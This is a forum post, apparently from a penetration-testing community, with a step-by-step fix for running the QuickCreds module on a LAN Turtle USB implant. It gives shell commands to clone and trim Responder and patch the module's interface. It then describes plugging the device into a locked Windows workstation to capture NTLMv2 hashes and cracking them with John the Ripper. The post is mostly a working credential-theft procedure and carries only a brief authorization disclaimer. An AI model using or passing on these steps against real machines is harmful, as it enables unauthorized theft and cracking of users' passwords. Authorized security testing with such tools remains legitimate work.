Jump to content
panadero

Fixing the Lan Turtle disk space issue with QuickCreds, no SD card

Recommended Posts

After much chagrin and googling, we found that QuickCreds will not work on the lan turtle because of disk space issues.  Here's our fix!

(we take no responsibility if you break something/somebody.  Only hack when you have prior approval and authorization!)

Factory reset, or push the turtle-5.bin firmware to reset  (probably need to upgrade to v5 anyway).  This makes sure you are set to base.  YMMV.
Open the lan turtle, push and hold the reset button for at least 5 seconds after plugging it into the machine
ssh in to 172.16.84.1, sh3llz, change password
Update the modules list
Only install QuickCreds for now, so we have enough space
Select QuickCreds and configure
Let it install it's dependencies
You can now set QuickCreds to 'Enable' so that it will start at boot
DO NOT REBOOT YET!
At this point, we're going to exit and git clone the responder package
DO NOT INSTALL RESPONDER FROM THE TURTLE MODULES LIST ITSELF
 
Exit 'turtle' back to a basic root shell
Git clone the Responder package first to /tmp since there is plenty of space. 
    git clone git://github.com/lgandx/Responder /tmp/Responder
BUT DON'T REBOOT YET, CAUSE YOU'LL LOSE EVERYTHING IN /tmp
du -sh /tmp/Responder
    3.8M
rm -rf /tmp/Responder/.git
rm -rf /tmp/Responder/tools/MultiRelay/
du -sh /tmp/Responder
    450.5k
We also want to remove the git package as it takes up >1MB of space.  QuickCreds installs it /only/ to git the Responder package  😕
 opkg remove git
 df -h 
     1.2M available on /
Move the Responder package back to /etc/turtle/ for QuckCreds to find it
mv /tmp/Responder/ /etc/turtle/
df -h
        1.1M still available on / now  (w00t)
 
The QuickCreds module is hardcoded to use br-lan as the interface.  This doesn't exist, so we need to change it to eth0.  Another 😕
    sed -i 's/br-lan/eth0/' /etc/turtle/modules/QuickCreds
 
You should now have at least 1MB of storage on / and plenty of space for /root/loot to write to, as well as have Responder available for QuickCreds
Pop the turtle in a Windows system and wait about 30 seconds until the amber light goes solid, CREDS!!!
Copy and paste the hash from /root/loot/#/HTTP-NTLMv2-172.16.84.127.txt
Paste into a hash file and send it to john with a wordlist
    john hash.txt --wordlist=wordlist.txt
 
Testing shows this works whether the laptop is locked or not locked.
These hashes can not be replayed, only cracked.
You still have plenty of space to return to the turtle shell and install any other modules you need at this point.
You may need git for something else, but probably not enough space.
This set up is for the "Grab creds from a locked Workstation" scenario.  You may need MultiRelay for something else...?  Not needed for QuickCreds.
 
ENJOY!
  • Like 2
  • Upvote 1

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...